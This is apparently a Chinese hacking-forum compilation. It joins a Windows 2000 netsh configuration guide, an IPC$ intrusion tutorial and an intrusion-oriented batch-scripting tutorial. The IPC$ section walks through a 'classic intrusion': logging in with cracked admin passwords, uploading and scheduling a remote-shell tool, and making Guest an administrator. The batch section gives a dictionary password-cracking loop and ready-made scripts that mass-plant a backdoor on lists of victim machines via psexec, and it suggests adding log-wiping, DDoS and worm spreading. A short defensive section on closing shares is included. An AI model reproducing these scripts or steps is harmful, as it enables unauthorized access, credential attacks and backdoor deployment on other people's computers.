使用 -f 命令行选项,或在 Netsh 命令提示符下发布 exec 全局命令,可以执行指定文件中所有的 netsh 命令。
要创建当前配置的脚本,请使用 dump 全局命令。dump 命令根据 netsh 命令输出当前运行的配置。可以使用该命令创建的脚本来配置新的服务器或重新配置现有的服务器。如果要对组件的配置作很大的更改,推荐您使用 dump 命令开始配置会话,以防在进行更改前需要还原配置。
Interface 命令
下表列出了可在 Windows 2000 命令提示符下键入的 netsh 命令,这些命令用于管理运行 Windows 2000 Server 及"路由和远程访问"服务的计算机上的接口设置。如果对某个特殊功能有多个命令,则在每个命令之间用斜线 (/) 分隔。
当在命令提示符下键入命令时,请在每个命令前加上 netsh。要获得每个命令的精确语法,可在命令之后键入 ?。选项例如,要获得 netsh interface 命令的命令行"帮助",请在命令提示符下键入 netsh interface?。
命令 说明
interface set/show interface 启用、禁用、连接、断开连接以及显示请求拨号接口的配置。
interface set/show credentials 在请求拨号接口上配置或显示用户名、密码和域名。
言归正传,现在来看看WIN2000下的网络设置的配置。 D:\>netsh
netsh>interface
interface>dump
#========================
# 接口配置
#========================
pushd interface
reset all
popd
# 接口配置结束
# ----------------------------------
# 接口 IP 配置
# ----------------------------------
pushd interface ip
# "本地连接 2" 的接口 IP 配置
set address name = "本地连接 2" source = dhcp
set dns name = "本地连接 2" source = dhcp
set wins name = "本地连接 2" source = dhcp
# "本地连接" 的接口 IP 配置
set address name = "本地连接" source = static addr = 192.168.1.10 mask = 255.255.255.0
set address name = "本地连接" gateway = 192.168.0.1 gwmetric = 1
set dns name = "本地连接" source = static addr = 192.168.0.1
set wins name = "本地连接" source = static addr = none
popd
# 接口 IP 配置结束
如果,你想快速修改一个本地IP地址。
你可以先用文本写入以下的内容:
interface ip
set address 本地连接 static 192.168.5.10 255.255.255.0 192.168.0.1 1
^^^ ^^^ ^^^ ^^^ ^^
接口名称 IP地址 子网掩码 网关 接口跃点数
如上保存为 local.sh
D:\>netsh exec local.sh
IPC$命令详解: 网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄. 不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少). 因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复! 二 什么是ipc$ IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。 利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。 我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。 所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的. 解惑: 1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能,其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数,所以不能在Windows 9.x中运行。 也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的) 2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接 3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表 三 建立ipc$连接在hack攻击中的作用 就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!! (基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server,还可以考虑开启终端服务方便控制.怎么样?够厉害吧!) 不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:( 因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接. 所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在. 四 ipc$与空连接,139,445端口,默认共享的关系 以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂) 1)ipc$与空连接: 不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了. 许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟). 2)ipc$与139,445端口: ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的. 3)ipc$与默认共享 默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享) 五 ipc$连接失败的原因 以下5个原因是比较常见的: 1)你的系统不是NT或以上操作系统; 2)对方没有打开ipc$默认共享 3)对方未开启139或445端口(惑被防火墙屏蔽) 4)你的命令输入有误(比如缺少了空格等) 5)用户名或密码错误(空连接当然无所谓了) 另外,你也可以根据返回的错误号分析原因: 错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限; 错误号51,Windows 无法找到网络路径 : 网络有问题; 错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤); 错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$; 错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。 错误号1326,未知的用户名或错误密码 : 原因很明显了; 错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况) 错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。 关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了. 六 如何打开目标的IPC$(此段引自相关文章) 首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马,当然,这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法),还是不行的话(比如有防火墙,杀不了)建议放弃。 七 如何防范ipc$入侵 1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》) 首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等) 2禁止默认共享 1)察看本地共享资源 运行-cmd-输入net share 2)删除共享(每次输入一个) net share ipc$ /delete net share admin$ /delete net share c$ /delete net share d$ /delete(如果有e,f,……可以继续删除) 3)停止server服务 net stop server /y (重新启动后server服务会重新开启) 4)修改注册表 运行-regedit server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。 pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。 如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。 3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务 控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用 4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师 5设置复杂密码,防止通过ipc$穷举密码 八 相关命令 1)建立空连接: net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格) 2)建立非空连接: net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格) 3)映射默认共享: net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推) 如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$ 4)删除一个ipc$连接 net use \\IP\ipc$ /del 5)删除共享映射 net use c: /del 删除映射的c盘,其他盘类推 net use * /del 删除全部,会有提示要求按y确认 九 经典入侵模式 这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈) 11. C:\>net use \\127.0.0.1\IPC$ "密码" /user:"用户名" 一般用流光,通过扫描弱口令来得到,管理员帐号和密码. 2. C:\>copy srv.exe \\127.0.0.1\admin$ 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。 3. C:\>net time \\127.0.0.1 查查时间,发现127.0.0.1 的当前时间是 2004/6/15 上午 11:00,命令成功完成。 4. C:\>at \\127.0.0.1 11:05 srv.exe 用at命令启动srv.exe吧 5. C:\>net time \\127.0.0.1 再查查到时间没有?如果127.0.0.1 的当前时间是 2004/6/15 上午 11:05,那就准备开始下面的命令。 6. C:\>telnet 127.0.0.1 99 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了 7.C:\>copy ntlm.exe \\127.0.0.1\admin$ 用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。 8. C:\WINNT\system32>ntlm 输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务! 9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈) 为了以防万一,我们再把guest激活加到管理组 10. C:\>net user guest /active:yes 将对方的Guest用户激活 11. C:\>net user guest 1234 将Guest的密码改为1234,或者你要设定的密码 12. C:\>net localgroup administrators guest /add 将Guest变为Administrator(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) |
1,怎样建立空连接,它有什么用?
答:使用命令 net use \IPipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。
对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权限的共享,访问小部分注册表等,没有什么利用价值。对2000作用就更小了。而且实现也不方便,需借助工具。
2.为什么我连不上IPC$?
答:1.只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。
2.确认你的命令没有打错。正确的命令是: net use \目标IPipc$ "密码" /user:"用户名"
注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用""表示。
3,根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
4,关于ipc$连不上的问题比较复杂,没有总结出一个统一的认识,在肉鸡上实验有时会得出矛盾的结论,十分棘手。 而且知道了问题所在,如果没有用其他办法获得shell,很多问题依然不能解决。
5,怎样打开目标的IPC$?
答:首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马。当然,这shell必须是admin权限的。然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上一问题可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法)。还是不行的话(比如有防火墙,杀不了)建议放弃。
6,怎样映射和访问默认共享?
答:使用命令 net use z: \目标IPc$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘,其他盘类推。
如果已经和目标建立了ipc$,则可以直接用IP加盘符加$访问。比如 copy muma.exe \IPd$pathmuma.exe 。或者再映射也可以,只是不用用户名和密码了:net use y: \IPd$ 。然后 copy muma.exe y:pathmuma.exe 。当路径中包含空格时,须用""将路径全引住。
7,如何删除映射和ipc$连接?
答:用命令 net use \IPipc$ /del 删除和一个目标的ipc$连接。
用命令 net use z: /del 删除映射的z盘,其他盘类推。
用命令 net use * /del 删除全部。会有提示要求按y确认。
8,连上ipc$然后我能做什么?
答:能使用管理员权限的帐号成功和目标连接ipc$,表示你可以和对方系统做深入“交流”了。你可以使用各种命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享(没开你就帮他开),你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具(木马)还具有直接控屏的功能。如果是2000server,还可以考虑开启终端服务方便控制。这里提到的工具的使用,请看自带的说明或相关教程。
9,怎样防止别人用ips$和默认共享入侵我?
答:A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。
1,先把已有的删除
net share ipc$ /del
net share admin$ /del
net share c$ /del
…………(有几个删几个)
2,禁止别人空连接
首先运行regedit,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous(DWORD)的键值改为:00000002。
3,禁止自动打开默认共享
对于server版,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareServer(DWORD)的键值改为:00000000。
对于pro版,则是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建一个再改键值。
B、另一种是关闭ipc$和默认共享依赖的服务(不推荐)
net stop lanmanserver
可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。
C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞,ipc$将为进一步入侵提供方便。
D、还有一个办法就是装防火墙,或者端口过滤。
简明批处理教程:
批处理命令如果运用得当,威力强大无人能敌!是不是想学习了呢,从今天我将把批处理的常用命令陆续的介绍给大家,如果大家有什么不懂的地方,可以写下评论:
批处理文件是无格式的文本文件,它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。在命令提示下键入批处理文件的名称,或者双击该批处理文件,系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。
一.简单批处理内部命令简介
1.Echo 命令
打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当前回显设置。
语法
echo [{on off}] [message]
Sample:@echo off / echo hello world
在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用> >> )结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。
2.@ 命令
表示不显示@后面的命令,在入侵过程中(例如使用批处理来格式化敌人的硬盘)自然不能让对方看到你使用的命令啦。
Sample:@echo off
@echo Now initializing the program,please wait a minite...
@format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的,可喜的是微软留了个autoset这个参数给我们,效果和/y是一样的。)
3.Goto 命令
指定跳转到标签,找到标签后,程序将处理从下一行开始的命令。
语法:goto label (label是参数,指定所要转向的批处理程序中的行。)
Sample:
if {%1}=={} goto noparms
if {%2}=={} goto noparms(如果这里的if、%1、%2你不明白的话,先跳过去,后面会有详细的解释。)
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
标签的名字可以随便起,但是最好是有意义的字母啦,字母前加个:用来表示这个字母是标签,goto命令就是根据这个:来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。
4.Rem 命令
注释命令,在C语言中相当与/*--------*/,它并不会被执行,只是起一个注释的作用,便于别人阅读和你自己日后修改。
Rem Message
Sample:@Rem Here is the description.
5.Pause 命令
运行 Pause 命令时,将显示下面的消息:
Press any key to continue . . .
Sample:
@echo off
:begin
copy a:*.* d:\back
echo Please put a new disk into driver A
pause
goto begin
在这个例子中,驱动器 A 中磁盘上的所有文件均复制到d:\back中。显示的注释提示您将另一张磁盘放入驱动器 A 时,pause 命令会使程序挂起,以便您更换磁盘,然后按任意键继续处理。
6.Call 命令
从一个批处理程序调用另一个批处理程序,并且不终止父批处理程序。call 命令接受用作调用目标的标签。如果在脚本或批处理文件外使用 Call,它将不会在命令行起作用。
语法
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
参数
[Drive:}[Path] FileName
指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。
7.start 命令
调用外部程序,所有的DOS命令和命令行程序都可以由start命令来调用。
入侵常用参数:
MIN 开始时窗口最小化
SEPARATE 在分开的空间内开始 16 位 Windows 程序
HIGH 在 HIGH 优先级类别开始应用程序
REALTIME 在 REALTIME 优先级类别开始应用程序
WAIT 启动应用程序并等候它结束
parameters 这些为传送到命令/程序的参数
执行的应用程序是 32-位 GUI 应用程序时,CMD.EXE 不等应用程序终止就返回命令提示。如果在命令脚本内执行,该新行为则不会发生。
8.choice 命令
choice 使用此命令可以让用户输入一个字符,从而运行不同的命令。使用时应该加/c:参数,c:后应写提示可输入的字符,之间无空格。它的返回码为1234……
如: choice /c:dme defrag,mem,end
将显示
defrag,mem,end[D,M,E]?
Sample:
Sample.bat的内容如下:
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag (应先判断数值最高的错误码)
if errorlevel 2 goto mem
if errotlevel 1 goto end
:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye
此文件运行后,将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ,然后if语句将作出判断,d表示执行标号为defrag的程序段,m表示执行标号为mem的程序段,e表示执行标号为end的程序段,每个程序段最后都以goto end将程序跳到end标号处,然后程序将显示good bye,文件结束。
9.If 命令
if 表示将判断是否符合规定的条件,从而决定执行不同的命令。 有三种格式:
1、if "参数" == "字符串" 待执行的命令
参数如果等于指定的字符串,则条件成立,运行命令,否则运行下一句。(注意是两个等号)
如if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms
2、if exist 文件名 待执行的命令
如果有指定的文件,则条件成立,运行命令,否则运行下一句。
如if exist config.sys edit config.sys
3、if errorlevel / if not errorlevel 数字 待执行的命令
如果返回码等于指定的数字,则条件成立,运行命令,否则运行下一句。
如if errorlevel 2 goto x2
DOS程序运行时都会返回一个数字给DOS,称为错误码errorlevel或称返回码,常见的返回码为0、1。
10.for 命令
for 命令是一个比较复杂的命令,主要用于参数在指定的范围内循环执行命令。
在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable
for {%variable|%%variable} in (set) do command [ CommandLineOptions]
%variable 指定一个单一字母可替换的参数。
(set) 指定一个或一组文件。可以使用通配符。
command 指定对每个文件执行的命令。
command-parameters 为特定命令指定参数或命令行开关。
在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable
而不要用 %variable。变量名称是区分大小写的,所以 %i 不同于 %I
如果命令扩展名被启用,下列额外的 FOR 命令格式会受到
支持:
FOR /D %variable IN (set) DO command [command-parameters]
如果集中包含通配符,则指定与目录名匹配,而不与文件
名匹配。
FOR /R [[drive:]path] %variable IN (set) DO command [command-
检查以 [drive:]path 为根的目录树,指向每个目录中的
FOR 语句。如果在 /R 后没有指定目录,则使用当前
目录。如果集仅为一个单点(.)字符,则枚举该目录树。
FOR /L %variable IN (start,step,end) DO command [command-para
该集表示以增量形式从开始到结束的一个数字序列。
因此,(1,1,5) 将产生序列 1 2 3 4 5,(5,-1,1) 将产生
序列 (5 4 3 2 1)。
FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN ('command') DO command
或者,如果有 usebackq 选项:
FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN ('command') DO command
filenameset 为一个或多个文件名。继续到 filenameset 中的
下一个文件之前,每份文件都已被打开、读取并经过处理。
处理包括读取文件,将其分成一行行的文字,然后将每行
解析成零或更多的符号。然后用已找到的符号字符串变量值
调用 For 循环。以默认方式,/F 通过每个文件的每一行中分开
的第一个空白符号。跳过空白行。您可通过指定可选 "options"
参数替代默认解析操作。这个带引号的字符串包括一个或多个
指定不同解析选项的关键字。这些关键字为:
eol=c - 指一个行注释字符的结尾(就一个)
skip=n - 指在文件开始时忽略的行数。
delims=xxx - 指分隔符集。这个替换了空格和跳格键的
默认分隔符集。
tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代
的 for 本身。这会导致额外变量名称的
格式为一个范围。通过 nth 符号指定 m
符号字符串中的最后一个字符星号,
那么额外的变量将在最后一个符号解析之
分配并接受行的保留文本。
usebackq - 指定新语法已在下类情况中使用:
在作为命令执行一个后引号的字符串并且
引号字符为文字字符串命令并允许在 fi
中使用双引号扩起文件名称。
sample1:
FOR /F "eol=;;; tokens=2,3* delims=, " %i in (myfile.txt) do command
会分析 myfile.txt 中的每一行,忽略以分号打头的那些行,将
每行中的第二个和第三个符号传递给 for 程序体;用逗号和/或
空格定界符号。请注意,这个 for 程序体的语句引用 %i 来
取得第二个符号,引用 %j 来取得第三个符号,引用 %k
来取得第三个符号后的所有剩余符号。对于带有空格的文件
名,您需要用双引号将文件名括起来。为了用这种方式来使
用双引号,您还需要使用 usebackq 选项,否则,双引号会
被理解成是用作定义某个要分析的字符串的。
%i 专门在 for 语句中得到说明,%j 和 %k 是通过
tokens= 选项专门得到说明的。您可以通过 tokens= 一行
指定最多 26 个符号,只要不试图说明一个高于字母 'z' 或
'Z' 的变量。请记住,FOR 变量是单一字母、分大小写和全局的;
同时不能有 52 个以上都在使用中。
您还可以在相邻字符串上使用 FOR /F 分析逻辑;方法是,
用单引号将括号之间的 filenameset 括起来。这样,该字符
串会被当作一个文件中的一个单一输入行。
最后,您可以用 FOR /F 命令来分析命令的输出。方法是,将
括号之间的 filenameset 变成一个反括字符串。该字符串会
被当作命令行,传递到一个子 CMD.EXE,其输出会被抓进
内存,并被当作文件分析。因此,以下例子:
FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i
会枚举当前环境中的环境变量名称。
另外,FOR 变量参照的替换已被增强。您现在可以使用下列
选项语法:
~I - 删除任何引号("),扩充 %I
%~fI - 将 %I 扩充到一个完全合格的路径名
%~dI - 仅将 %I 扩充到一个驱动器号
%~pI - 仅将 %I 扩充到一个路径
%~nI - 仅将 %I 扩充到一个文件名
%~xI - 仅将 %I 扩充到一个文件扩展名
%~sI - 扩充的路径只含有短名
%~aI - 将 %I 扩充到文件的文件属性
%~tI - 将 %I 扩充到文件的日期/时间
%~zI - 将 %I 扩充到文件的大小
%~$PATH:I - 查找列在路径环境变量的目录,并将 %I 扩充
到找到的第一个完全合格的名称。如果环境变量
未被定义,或者没有找到文件,此组合键会扩充
空字符串
可以组合修饰符来得到多重结果:
%~dpI - 仅将 %I 扩充到一个驱动器号和路径
%~nxI - 仅将 %I 扩充到一个文件名和扩展名
%~fsI - 仅将 %I 扩充到一个带有短名的完整路径名
%~dp$PATH:i - 查找列在路径环境变量的目录,并将 %I 扩充
到找到的第一个驱动器号和路径。
%~ftzaI - 将 %I 扩充到类似输出线路的 DIR
在以上例子中,%I 和 PATH 可用其他有效数值代替。%~ 语法
用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名
比较易读,而且避免与不分大小写的组合键混淆。
以上是MS的官方帮助,下面我们举几个例子来具体说明一下For命令在入侵中的用途。
sample2:
利用For命令来实现对一台目标Win2k主机的暴力密码破解。
我们用net use \\ip\ipc$ "password" /u:"administrator"来尝试这和目标主机进行连接,当成功时记下密码。
最主要的命令是一条:for /f i% in (dict.txt) do net use \\ip\ipc$ "i%"
/u:"administrator"
用i%来表示admin的密码,在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find命令--
for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%"
/u:"administrator"|find ":命令成功完成">>D:\ok.txt ,这样就ko了。
sample3:
你有没有过手里有大量肉鸡等着你去种后门+木马呢?,当数量特别多的时候,原本很开心的一件事都会变得很郁闷:)。文章开头就谈到使用批处理文件,可以简化日常或重复性任务。那么如何实现呢?呵呵,看下去你就会明白了。
主要命令也只有一条:(在批处理文件中使用 FOR 命令时,指定变量使用 %%variable)
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat
%%i %%j %%k
tokens的用法请参见上面的sample1,在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。
而cultivate.bat无非就是用net use命令来建立IPC$连接,并copy木马+后门到victim,然后用返回码(If
errorlever =)来筛选成功种植后门的主机,并echo出来,或者echo到指定的文件。
delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i
%%j %%k表示的对象来排列,一般就是 ip password username。
代码雏形:
--------------- cut here then save as a batchfile(I call it main.bat )
---------------------------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call
IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat )
---------------------------
------------------- cut here then save as a batchfile(I call it door.bat)
-----------------------------
@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1
USER %2 PWD %3 >>ko.txt
@psexec \\%1 c:\winnt\system32\windrv32.exe
@psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored
>>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat)
--------------------------------
这只是一个自动种植后门批处理的雏形,两个批处理和后门程序(Windrv32.exe),PSexec.exe需放在统一目录下.批处理内容
尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究.
二.如何在批处理文件中使用参数
批处理中可以使用参数,一般从1%到 9%这九个,当有多个参数时需要用shift来移动,这种情况并不多见,我们就不考虑它了。
sample1:fomat.bat
@echo off
if "%1"=="a" format a:
:format
@format a:/q/u/auotset
@echo please insert another disk to driver A.
@pause
@goto fomat
这个例子用于连续地格式化几张软盘,所以用的时候需在dos窗口输入fomat.bat a,呵呵,好像有点画蛇添足了~^_^
sample2:
当我们要建立一个IPC$连接地时候总要输入一大串命令,弄不好就打错了,所以我们不如把一些固定命令写入一个批处理,把肉鸡地ip password
username 当着参数来赋给这个批处理,这样就不用每次都打命令了。
@echo off
@net use \\1%\ipc$ "2%" /u:"3%" 注意哦,这里PASSWORD是第二个参数。
@if errorlevel 1 echo connection failed
怎么样,使用参数还是比较简单的吧?你这么帅一定学会了^_^.No.3
三.如何使用组合命令(Compound Command)
1.&
Usage:第一条命令 & 第二条命令 [& 第三条命令...]
用这种方法可以同时执行多条命令,而不管命令是否执行成功
Sample:
C:\>dir z: & dir c:\Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\Ex4rch
2002-05-14 23:51 <DIR> .
2002-05-14 23:51 <DIR> ..
2002-05-14 23:51 14 sometips.gif
2.&&
Usage:第一条命令 && 第二条命令 [&& 第三条命令...]
用这种方法可以同时执行多条命令,当碰到执行出错的命令后将不执行后面的命令,如果一直没有出错则一直执行完所有命令;
Sample:
C:\>dir z: && dir c:\Ex4rch
The system cannot find the path specified.
C:\>dir c:\Ex4rch && dir z:
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\Ex4rch
2002-05-14 23:55 <DIR> .
2002-05-14 23:55 <DIR> ..
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
2 Dir(s) 768,671,744 bytes free
The system cannot find the path specified.
